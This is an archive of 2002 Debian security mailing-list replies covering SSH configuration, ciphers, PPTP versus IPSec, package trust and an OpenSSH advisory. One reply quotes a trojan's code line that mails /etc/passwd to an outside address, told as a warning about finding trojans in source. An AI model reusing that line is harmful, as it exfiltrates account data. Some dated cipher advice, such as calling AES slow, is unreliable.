Re: Bastian Gl??er/PD/Kreditwerk ist au?er Haus.
No Perl? ;) -Anne On Fri, Apr 12, 2002 at 10:09:27PM +0300, Edmunds wrote: > Hi All, > > I know that Debian origin is Deutchland, but for a good style in mailing > lists I think we should use English or C :) > > Debian user > > > - Original Message - > From: "Dennis Stampfer" <[EMAIL PROTECTED]> > To: "Bastian Gl??er" <[EMAIL PROTECTED]>; > > Sent: Friday, April 12, 2002 8:49 PM > Subject: Re: Bastian Gl??er/PD/Kreditwerk ist au?er Haus. > > > > On Fri, Apr 12, 2002 at 08:33:06PM +0200, Bastian Gl??er wrote: > > > Ich werde ab 26.03.2002 nicht im B?ro sein. Ich kehre zur?ck am > 23.12.2024. > > > > > > Ich werde Ihre Nachricht ?berhaupt nicht mehr beantworten. > > > > oh, no. Will that autoreply continue to 2024? > > > > > > -- > > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > > > > > > > > > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgptE4wmsEuW5.pgp Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 12:13:46PM +0300, Jussi Ekholm wrote:
> Anne Carasik <[EMAIL PROTECTED]> wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Oh shit, that's evil. Where did you manage a software including this
> kind of source code in first place? Don't say freshmeat.net! Or
> sourceforge.net... I'm glad you were able to detect this and not run
> the software.
I can't remember, other than some obviously suspect code. It was an ssh
trojan, if I remember correctly.
> Big sigh, indeed. I hate these script kiddies, crackers and people,
> who only does harm to other people online. Was it a take-over of
> an IRC channel, breaking to someone's system or whatever. I just
> hate these people. I've never seen computer, internet connection and
> everything related as a tools to cause harm and destruction. It's
> beyond me, what satisfaction does these persons get...
I don't think they have anything better to do (at least the script
kiddies). Some groups, like in the Middle East and China, feel that
they have a sudden interest in attacking US sites.
However, I'm sure there are other groups attacking the Middle East and
China as well.
You should see some of the stupid stuff script kiddies leave on the
systems--they don't even change the mtime or the logs, not to mention
leave the code behind with URLs in it.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpfYfAp4Cex0.pgp
Description: PGP signature
Re: does virus ELF.OSF.8759 affect debian?
On Wed, Apr 17, 2002 at 05:06:03PM -0500, Bryan Andersen wrote:
> > Compile from source is a good idea too. It's amazing what you
> > can find in the source. I found a couple of stupid Trojans
> > that way.
> >system("mail /etc/passwd [EMAIL PROTECTED]");
> Yeh, and it's buggy too
> Take a close look at what really happens.
I'm sure it is. [EMAIL PROTECTED] doesn't exist. ;)
Seriously, I know it is. The other thing is, I use shadow most of the
time. Still, the username information is never a good thing to share.
-Anne
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpWnq6XAr2NO.pgp
Description: PGP signature
Re: Guarding against evil software installation scripts?
Dude, and I thought I'm paraniod :) Even I trust the debian sources in /etc/apt/sources.list, not without the PGP key or MD5 of course. Just make sure the digital signature and/or MD5 checksum comes from a trusted source. Unless, of course, you want to write your own code. :) -Anne On Wed, Apr 17, 2002 at 09:52:24PM -0700, Tim Freeman wrote: > At the moment my system has 876 packages installed. They were all > installed by root. Each package gets a chance to run an arbitrary > shell script as root, so it seems to me that there must have been much > more than 876 opportunities for my system to get utterly destroyed by > absolute strangers. So far, none of them decided to do me in. It's > surprising it all works so well. > > This leads to some questions: > > 1. Have there been problems with people submitting malicious packages, >or packages that were so buggy they might have well been malicious? >If so, what happened? > > 2. Are there any ideas about how to tighten this up a bit? Here are >some vague ideas: > > 2a. I can vaguely imagine something where many packages run their >installation scripts under a user id unique to that package, so the >installation script is therefore unable to arbitrarily destroy >everything. > > 2b. It might be possible to do it with only one special user id for >package installs, where a root process chowns everything owned by >the package after the install script is complete, and chowns it >back before an uninstall script runs. You'd need a separate >database that lists which files got chowned so you'll know to chown >them back later. > > 2c. Perhaps something like XFS access lists could be used (if everyone >were running XFS) or SELinux or LIDS (where did the .deb for LIDS go, >by the way?) I have no experience with any of these, so this may be >nonsense. > > I don't see a clear path to doing this the "right" way, where chaos is > prevented by something more substantial than a social convention. > > I have to admit that the social convention is working very well at the > moment, though. > > -- > Tim Freeman > [EMAIL PROTECTED] > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpIzTjkKrLVy.pgp Description: PGP signature
Re: Lost root password!!
On Mon, Apr 22, 2002 at 04:12:02PM -0600, Stefan Srdic wrote: > Last night when I attempted to change my root password passwd bunked out on > me. It crashed and I received the following message on the console: > > passwd: Critical error - immediate abort Ooo... > I thought that I could still use my old root password but cannot. I attempted > to boot straight into a shell (init=/bin/sh) and manually expire my root > password (so that I could change it on the next login) and ended up with the > same results. I've also tried deleting the root passwd to see if I could then > re-run passwd as root and change my passwd. No luck. Have you used a rescue disk or installation CD? > I can still log into my system as a normal user but cannot change any users > passwords, I get the same error message as above. Is your /etc/passwd or /etc/shadow have invalid entries or gotten corrupted? > Is passwd in Woody broken? How can I fix my broken root password without > harming my system? I hope not :( -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgp7XDkgpyrUH.pgp Description: PGP signature
Re: disable RPC
Try # apt-get remove --purge pkgname That will remove anything related to the package (sometimes, the directories aren't removed like /etc/pkgname). Also, try # dpkg --get-selections | grep -i portmap To see other packages related to RPCs.. -Anne On Wed, Apr 24, 2002 at 11:26:16AM -0400, Andrew Kaplan wrote: > How do I disable RPC. I know the scripts can be removed from init.d But I > know there's a command similar to "apt-get remove ???" or something similar. > That removes is completely. > > Andrew P. Kaplan > Network Administrator > CyberShore, Inc. > http://www.cshore.com > > > "Somehow I imagined this experience would be more rewarding" Calvin > > > > > > > --- > Outgoing mail is certified Virus Free. > Checked by AVG anti-virus system (http://www.grisoft.com). > Version: 6.0.332 / Virus Database: 186 - Release Date: 3/6/02 > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpYht4hk8n4I.pgp Description: PGP signature
Re: PPTP with Encryption
Last time I checked, PPTP comes with encryption. All you have to do is configure it. From Freshmeat: PoPToP About: PoPToP is a PPTP server for use in PPTP VPN environments. The current release version supports Windows 95/98/NT/2000 PPTP clients and PPTP Linux clients. With the relevant patches, PoPToP supports Windows PPTP clients with the full range of encryption and authentication features. From apt-cache: pptpd - PoPToP Point to Point Tunneling Server I don't think you should have any patching to do. :) The home page for poptop is at http://www.poptop.org. -Anne On Tue, Apr 30, 2002 at 10:54:24AM -0400, Derek J. Balling wrote: > Does anyone have a nice simple HOWTO on how to add encryption to the > pptpd daemon, so that windows VPN users can connect using encryption? > Preferred methods do NOT include patching things, if possible, > because I'd like to not have to re-patch things every time new > upgrades come out. > > Has anyone built all the necessary items simply as .deb's? > > D > > -- > +-+-+ > | [EMAIL PROTECTED] | "Thou art the ruins of the noblest man | > | Derek J. Balling | That ever lived in the tide of times. | > | | Woe to the hand that shed this costly | > | | blood" - Julius Caesar Act 3, Scene 1 | > +-+-+ > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpoTiz2GzaBc.pgp Description: PGP signature
Re: PPTP with Encryption
On Tue, Apr 30, 2002 at 12:03:09PM -0400, Derek J. Balling wrote: > >I don't think you should have any patching to do. :) The home page > >for poptop is at http://www.poptop.org. > Not unless the packaged pptpd/ppp has something else, from the poptop.org > page: > # Available PPPD patch allows Windows compatible encryption and > authentication (MSCHAPv2 and MPPE 40-128 bit RC4 encryption) You're right.. (I guess you do want to encrypt to a Windows box, so make sure you're using full strength RC4.. 40 bit keys can be brute forced). According to the poptop FAQ: 3.0 PPP (and MSCHAPv2/MPPE) Installation It is only necessary to use PPP 2.3.8 if you want Microsoft compatible MSCHAPv2/MPPE authentication and encryption. The reason for this is that the MSCHAPv2/MPPE patch currently supplied (19990813) is against PPP 2.3.8. If you don't need Microsoft compatible authentication/encryption any 2.3.x PPP source will be fine. [...] The instructions look like you need to make a kernel module. > So it seems like theres SOMETHING I need to add to pppd to get > encryption to work with it, and (from my reading) it seems like > there's a patch that also needs to go in the kernel to make that pppd > change work as well. Out of curiousity, why PPTP? Why not IPSec? There's better compatibility with IPSec (FreeSWAN), and it looks like poptop hasn't been updated in a long time (since 1999). Also, Win2K and I think (don't quote me on this) WinXP have builtin IPSec support. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpx2WQb2HIoE.pgp Description: PGP signature
Re: PPTP with Encryption
On Tue, Apr 30, 2002 at 01:24:21PM -0400, Derek J. Balling wrote: > >As a side note: have you considered that using the encryption in pptp > >forces you to store userpasswords in cleartext? For my ISP [1] that was > >a reason not to use pptp's encryption, especially since MS-CHAPv2 > >contains known security holes [2]. > > Yes, unfortunately, for our predominant workstation (Win98), M$'s > PPTP client is ubiquitous and other solutions are not necessarily so > commonly deployed. > > D > (who would LOVE to move to a _MORE_ secure solution, but is content, > for now, to only allow himself and one other to even have accounts on > the box with the cleartext passwds) Ugh.. I'd never be content with cleartext passwords, especially given how many security solutions are around today. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpWoXwofngwG.pgp Description: PGP signature
Re: Safe to use Mindterm?
Security issues? Can you be more specific? There aren't any security issues (yet) with the SSH 2.0 protocol. From what I know, there aren't any issues using mindterm for 2.0 either :) -Anne This one time, Preben Randhol wrote: > Hi > > I'm looking for a way to log into my computer via ssh and a web browser. > I see mindterm can do this, but last I checked it used ssh < 2.0, and I > understood that there where security issues with this. Is that correct? > Are there any replacement software for mindterm? > > Thanks of any hints in advance! > > Preben > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpE7qh1XXUVO.pgp Description: PGP signature
Re: Safe to use Mindterm?
I thought there was.. Appgate is charging for it?!? How sad, and they don't even list the price. *Sigh* -Anne This one time, Preben Randhol wrote: > Thanks for your information, it was that I was looking for. I guess > there are no mindterm clones out there with SSH 2.0 support (Open > Source/Free Software of course)? > > > -- > Preben Randhol --- http://www.pvv.org/~randhol/ -- > ?For me, Ada95 puts back the joy in programming.? > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpzSA0EiWzFy.pgp Description: PGP signature
Re: force to use SSH2
In sshd_config, make sure you only have protocol 2 defined:
Protocol 2
Then restart sshd.
-Anne
This one time, Eduardo Gargiulo wrote:
> Hi all.
>
> Which is the best way to ensure that clients will connect using ssh2
> and not ssh1? How can I avoid the use of ssh1?
>
> TIA
>
> --
> Eduardo Gargiulo
> ^ejg(-.*)[EMAIL PROTECTED]
--
.-"".__."``". Anne Carasik, System Administrator
.-.--. _...' (/) (/) ``' [EMAIL PROTECTED]
(O/ O) \-' ` -="""=.', Center for Advanced Computing Research
~`~~
pgpQjomZBfNeW.pgp
Description: PGP signature
Re: SSH
It also depends if you've enabled MD5 passwords. If not, you can only use up to 8 characters. -Anne This one time, Pawel Romanek wrote: > > Hi !! > > Then I was playing with sshd I had discovered > that it checks only 8 (first) characters > of my password, the remainder can be omitted ;) > > Is it normal situation or my sshd > is configured incorrectly > (i use default configuration from package) ? > > ssh -V shows: > > OpenSSH_3.0.2p1 Debian 1:3.0.2p1-8, SSH protocols 1.5/2.0, OpenSSL 0x0090603f > > Regards > P.R. > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpHpP3G17602.pgp Description: PGP signature
Re: PGP Keyserver
Here's a whole slew listed at: http://www.openpgp.net/pgpsrv.html -Anne This one time, Phillip Hofmeister wrote: > All, > > There may be a thread on this topic...somwhere... > > But, is there a fairly populated pgp keyserver besides > wwwkeys.pgp.net? > > Thanks, > > Phil > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpJLOLTZmRv5.pgp Description: PGP signature
Re: SSH2 Encryption
Hi Jeff, This one time, Jeff Bonner wrote: > I've been playing around with a Woody installation, connecting to it via > SSH2, with SecureCRT 3.4 for Win32. I think I've finally figured out what > encryption types this Debian package (ssh 3.0.2p1-9) supports, but please > correct me if I'm wrong -- http://www.openssh.org/features.html lists *only* > 3DES and Blowfish: > AES-128 > AES-192 > AES-256 (isn't this Rijndael now?) > Triple DES > Blowfish > RC4 > rijndael-128cbc > rijndael-192cbc > rijndael-256cbc > [EMAIL PROTECTED] [sic] > CAST-128cbc Check the man page for what ciphers SSH2 accepts. I usually leave it on Blowfish because it's secure and it's the fastest cipher. AES sucks because it's dog slow, and it doesn't buy you that much more security than Blowfish. > Also, there's an option in SecureCRT called "MAC" which I guess refers > to the > hash: MD5, SHA1, MD5-96, and SHA1-96. Pick SHA1 or SHA1-96. MD5 has been broken (or it's close to). > Questions: > > 1) Are all those ciphers actually available in my SSH package? Yep, as long as you have OpenSSL support :) > 2) The SHA1-96 hash should be better than MD5-96, correct? Correct. > 3) Any reason you *wouldn't* want to use compression in SSH? Yes, if you're going over a high speed line, no reason to use compression. If you're connecting through a slow line (like a modem), use compression. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpddVAxohnvS.pgp Description: PGP signature
Re: SSH2 Encryption
This one time, Jeff Bonner wrote: > On Mon 10 Jun 2002 13:23, Anne Carasik wrote: > > This one time, Jeff Bonner wrote: > As in, "This one time, at band camp..."? >;) Also, sorry about > the wretched linebreaks, folks. Good ol Outlook. Yes, exactly. :) I got tired of the typical attribution line. > Well, the manpage for ssh(1) shows the following, under SSH2: > >"Protocol 2 provides additional mechanisms for >confidentiality (the traf-fic is encrypted using >3DES, Blowfish, CAST128 or Arcfour) and integrity >(hmac-md5, hmac-sha1)" > > However, it seems this package does support all the ones I had > given originally, as I mention in my reply to Mark Janssen on > this list; they showed up in my daemon.log later. Yep. Same with mine. Under Ciphers doesn't provide you with much more either *sigh*. > After reading the manpage to quote above, I noticed that it's > only applicable to SSH1 anyway, so I guess it doesn't matter. > :) What, compression? Compression should work with both SSH1 and SSH2 protocols. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpYzTwKBtG61.pgp Description: PGP signature
Re: SSH2 Encryption
This one time, Loic Le Loarer wrote: > Le Monday 10 June 2002 ? 10:23:23 -0700, Anne Carasik a ?crit: > > Check the man page for what ciphers SSH2 accepts. I usually leave it on > > Blowfish because it's secure and it's the fastest cipher. AES sucks > > because it's dog slow, and it doesn't buy you that much more security > > than Blowfish. > > I'm surprised that you say AES is slow because it has been made to be > realy fast. I'm curious to know in what conditions to you find it slow ? It didn't turn out that way. It's faster than 3DES, but not faster than Blowfish. It was designed to be faster than 3DES, but not anything else. It was designed to replace the old US standard, not any of the others. > Perhaps the OpenSSH implementation is not good... No, it has nothing to do with the OpenSSH or SSH.com implementations. Or any IPSec implementation for that matter. Anytime we have performance problems, we switch to Blowfish (which isn't implemented in FreeSWAN :( as of yet). It makes a tremendous difference over slow lines, or anything else for that matter. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' [EMAIL PROTECTED] (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpeTR8jk9vAF.pgp Description: PGP signature
Re: [Fwd: ISS Advisory: OpenSSH Remote Challenge Vulnerability]
disabling the Challenge-Response authentication parameter within the > OpenSSH daemon configuration file. This filename and path is typically: > /etc/ssh/sshd_config. To disable this parameter, locate the > corresponding line and change it to the line below: > > ChallengeResponseAuthentication no > > The "sshd" process must be restarted for this change to take effect. > This workaround will permanently remove the vulnerability. X-Force > recommends that administrators upgrade to OpenSSH version 3.4 > immediately. This version implements privilege separation, contains a > patch to block this vulnerability, and contains many additional pro- > active security fixes. Privilege separation was designed to limit > exposure to known and unknown vulnerabilities. Visit > http://www.openssh.com for more information. > > Additional Information: > > ISS X-Force and Black Hat consulting will host a presentation titled, > "Professional Source Code Auditing" at Black Hat Briefings USA 2002. The > presentation will explore advanced source code auditing techniques as > well as secure development best-practices. Please refer to > http://www.blackhat.com and > http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#Dowd for > more information. > > Credits: > > The vulnerability described in this advisory was discovered and > researched by Mark Dowd of the ISS X-Force. ISS would like to thank Theo > de Raadt of the OpenBSD Project for his assistance with this advisory. > > > > __ > > About Internet Security Systems (ISS) > Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a > pioneer and world leader in software and services that protect critical > online resources from an ever-changing spectrum of threats and misuse. > Internet Security Systems is headquartered in Atlanta, GA, with > additional operations throughout the Americas, Asia, Australia, Europe > and the Middle East. > > Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved > worldwide. > > Permission is hereby granted for the electronic redistribution of this > document. It is not to be edited or altered in any way without the > express written consent of the Internet Security Systems X-Force. If you > wish to reprint the whole or any part of this document in any other > medium excluding electronic media, please email [EMAIL PROTECTED] for > permission. > > Disclaimer: The information within this paper may change without notice. > Use of this information constitutes acceptance for use in an AS IS > condition. There are NO warranties, implied or otherwise, with regard to > this information or its use. Any use of this information is at the > user's risk. In no event shall the author/distributor (Internet Security > Systems X-Force) be held liable for any damages whatsoever arising out > of or in connection with the use or spread of this information. > > X-Force PGP Key available on MIT's PGP key server and PGP.com's key > server, as well as at http://www.iss.net/security_center/sensitive.php > > Please send suggestions, updates, and comments to: X-Force > > -BEGIN PGP SIGNATURE- > Version: 2.6.2 > > iQCVAwUBPRnHMDRfJiV99eG9AQHc3wQApUjGfFHFybhfo8vCqlNZ63eEu7ehQyiF > lrufj/P7q2cFY/VLICepeDtLhP52bcchNm3WTlaIT3wWLnZzObvgtabHOIax0Z7t > oob/Li9+NTB2abwvQiFoX37DPmbhFJ6p1UxgfvVQ6+77nPZse/ID+EFSwLVGL45t > ak0sHKrvD0o= > =MfYf > -END PGP SIGNATURE- > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpFDG6u2M9bM.pgp Description: PGP signature
Re: [Fwd: ISS Advisory: OpenSSH Remote Challenge Vulnerability]
Hi Simon, This one time, [EMAIL PROTECTED] wrote: > I am a bit worried about the ssh advisories, not the actual package > itself (well, that too) but the way it was handled -- the openssh team > issued new versions of a package and a security advisory asking > everyone to update to the new package, Debian and others jumped on it > and sent the new version out. The possibility of distributing a wide > scale worm or virus using this approach is obvious. Always, always, check the digital signature. I don't think that Theo and co. would want to distribute a worm in this way. This would defeat their purpose for existence in the UNIX security world. I agree though.. it's really poorly handled. I really hope that's what the deb packagers do before creating the package. Speaking of which.. When is Debian going to implement SHA-1 checksums or gpg sigs into the apt-get, dpkg, and the debs before installing? This just trusting the deb source is really scary.. > violating the social contract as well. If the social contract was > followed, there wouldn't be a security advisories based on information > that the community cannot verify (in this case, I understand that not > even the security officers could verify if the ssh package was > vulnerable or not?). Only when someone points at the code that is > bad, in public, and it is agreed that it is bad, only then should a > security update be made. Wow, this and Apache all in a matter of weeks ;-). *sigh* I agree, especially since any monkey can go and audit the source themselves. > One (somewhat costly) way to solve this would be to have two kinds of > security updates. One is made early and with information not > available to the community, the other is made only when the community > can verify security bugs. Users can decide which one they want to > trust. I would say use one or the other, but not both. This is something the security community should decide, not the users. You'll confuse the poor folks ;) > Anyone share my concerns? *raises hand* Both the Apache and OpenSSH announcements were done poorly, without any reasonable thought given to the user community. They should be taken out and shot ;-) (IMHO). -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgphq6WqICg8G.pgp Description: PGP signature
Re: YASP (Yet Another SSH Problem)
Hi Andreas, It could be a couple of things: Ok, what is your permissions on /etc/ssh/ssh_config, and the ~/.ssh directory? Also, ask your ISP if they've had networking problems. They could have also change the sshd_config and you could be doing DNS Name checking as well. -Anne This one time, Andreas Syksa wrote: > Hello List, > > I got a nasty problem after I've updated my OpenSSH to > Version 3.3: > > Right after the update everything worked fine for me. > I could connect to the server - tested everything - fine. > At home, with my laptop in my bed I connected last time > and was suddenly kicked out. > > I was not able to reconnect an thought: time to sleep now. > The day after I realized: I've got a problem: > > ### > [EMAIL PROTECTED]:~> ssh -v -v 23.42.23.42 -l moeppel > OpenSSH_3.0.2p1, SSH protocols 1.5/2.0, OpenSSL 0x0090603f > debug1: Reading configuration data /etc/ssh/ssh_config > debug1: Applying options for * > debug1: Seeding random number generator > debug1: Rhosts Authentication disabled, originating port will not be trusted. > debug1: restore_uid > debug1: ssh_connect: getuid 500 geteuid 0 anon 1 > debug1: Connecting to 23.42.23.42 [23.42.23.42] port 22. > debug1: temporarily_use_uid: 500/100 (e=0) > debug1: restore_uid > debug1: temporarily_use_uid: 500/100 (e=0) > debug1: restore_uid > debug1: Connection established. > debug1: read PEM private key done: type DSA > debug1: read PEM private key done: type RSA > debug1: identity file /home/slupp/.ssh/identity type -1 > debug1: identity file /home/slupp/.ssh/id_rsa type -1 > debug1: identity file /home/slupp/.ssh/id_dsa type -1 > debug1: Remote protocol version 2.0, remote software version OpenSSH_3.3 > Debian 1:3.3p1-0.0potato2 > debug1: match: OpenSSH_3.3 Debian 1:3.3p1-0.0potato2 pat ^OpenSSH > Enabling compatibility mode for protocol 2.0 > debug1: Local version string SSH-2.0-OpenSSH_3.0.2p1 > debug1: SSH2_MSG_KEXINIT sent > Connection closed by 23.42.23.42 > debug1: Calling cleanup 0x80640b0(0x0) > ### > > I've tried it with "ssh -1" as well as with "ssh -o" > but without any success. > As my machine is located at an ISP I've no chance > to get to the console. A bit scary is, that it worked > fine for several logins from Windows / Putty and > Linux with ssh-clients below 3.3 (as seen above). > > The system has all patches / new versions of software > available installed (Apache, Bind, mod_ssl, Proftpd...) > Any idea what might have happend? > > thanks a lot, > Andreas > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgptmUqjS4hBr.pgp Description: PGP signature
Re: SSH RSA Authentication
Hi there, SSH.com and OpenSSH use completely different public key formats. Take a look at http://www.ssh.com/faq/index.cfm?id=1243 for public key interop *notes to self that this needs to be in the Secure Shell FAQ as well* -Anne This one time, Jussi Ekholm wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Dietmar Goldbeck <[EMAIL PROTECTED]> wrote: > > On Sat, Jun 22, 2002 at 02:20:20AM -0500, Rob VanFleet wrote: > >> On machine A, I run ssh-keygen, and generate an identity and > >> identity.pub. I copy identity.pub to ~/.ssh/authorized_keys on Machine > >> B, but it still prompts for the system password, not my keyphrase. > > > > It is very difficult to help you without error messages, since there > > shouldn't be a problem. openssh 3.0.2 and 3.2.3 play perfectly well > > with each other. > > I'm having similar problem, only difference being different SSH > softwares between two systems. My end has OpenSSH 3.4: > > OpenSSH_3.4p1 Debian 1:3.4p1-0.0woody1, SSH protocols 1.5/2.0 > > And the other system has: > > ssh: SSH Secure Shell 3.0.1 (non-commercial version) > > I'm actually quite ignorant with SSH Communications Security Corp's SSH, > so could someone guide me a bit? I tried generating RSA key with > 'ssh-keygen -t rsa -N ""' and copying it to this remote server to > directory ~/.ssh/authorized_keys2. But then I noticed, that the remoted > SSH uses ~/.ssh2 and I tried to look up the FILES section of SSH2(1), > for no avail. > > > Try generating new keys for protocol 2 with "ssh-keygen -d", > > copy them with "ssh-copy-id" and try again. > > What does option '-d' for ssh-keygen do? My ssh-keygen doesn't even know > it; or at least '--help' doesn't show it... > > - -- > Jussi Ekholm -- [EMAIL PROTECTED] -- http://erppimaa.ihku.org/ > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.0.7 (GNU/Linux) > > iD8DBQE9HTF2AtEARxQQCB4RAnoVAJ0TGFDzuAMxDuUhgaJ1ewMb+ZszkACgv583 > sNKWyjqZOkxho+qUm7Lc4NY= > =Mw0P > -END PGP SIGNATURE- > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpcdNr6cQsT4.pgp Description: PGP signature
More SSH Fun (X11 forwarding)
Hi all, I'm having really weird problem with X11 forwarding and two Debian boxes. I can login with OpenSSH and scp and everything else no problem. However, when I try to launch an xterm, I get either: can't open DISPLAY Or the display is set to server:10.0. I don't have this problem SSH'ing into any RH boxes. The version I'm running on both the client and server is: OpenSSH_3.4p1 Debian 1:3.4p1-2, SSH protocols 1.5/2.0, OpenSSL 0x0090604f Let me know if you have any ideas. Running the client and server in both verbose and debugging modes provides me with nothing useful :( -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpUi279YkgBg.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
This one time, Norbert Preining wrote: > On Mon, 01 Jul 2002, Anne Carasik wrote: > > Let me know if you have any ideas. Running the client and server in both > > verbose and debugging modes provides me with nothing useful :( > Did you set > X11Forwarding yes > in both sshd_config on server and ssh_config (.ssh/config) on client? It doesn't matter about the sshd_config, only the ssh_config on the client. Anyway, they are both set to X11Forwarding yes The only other changes I've made are the following: If I set X11UseLocalhost to yes on the server, I get this: server:/home/gator- xterm xterm Xt error: Can't open display: server:/home/gator- echo $DISPLAY DISPLAY: Undefined variable. If I set X11UseLocalhost to no, I get this: server:/home/gator- xterm xterm Xt error: Can't open display: server:/home/gator- xterm xterm Xt error: Can't open display: server:10.0 So, if I force X11 with the -X (even though my ssh_config on the client is set to X11Forwarding yes), I get this: So, it looks like I have to have X11UseLocalhost set to no, but I still can't open the X11. Any ideas? Also, I did HUP the server between changes. :) -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpGVaDpwYhF5.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
This one time, Noah L. Meyerhans wrote: > On Mon, Jul 01, 2002 at 01:48:31PM -0700, Anne Carasik wrote: > > So, if I force X11 with the -X (even though my ssh_config on > > the client is set to X11Forwarding yes), I get this: > Get what? Uh, the output that I included. > You don't have UseLogin set in sshd_config, do you? No. -Anne -- .-"".__."``". Anne Carasik, System Administrator .-.--. _...' (/) (/) ``' gator at cacr dot caltech dot edu (O/ O) \-' ` -="""=.', Center for Advanced Computing Research ~`~~ pgpm4KqUeVmay.pgp Description: PGP signature
Re: More SSH Fun (X11 forwarding)
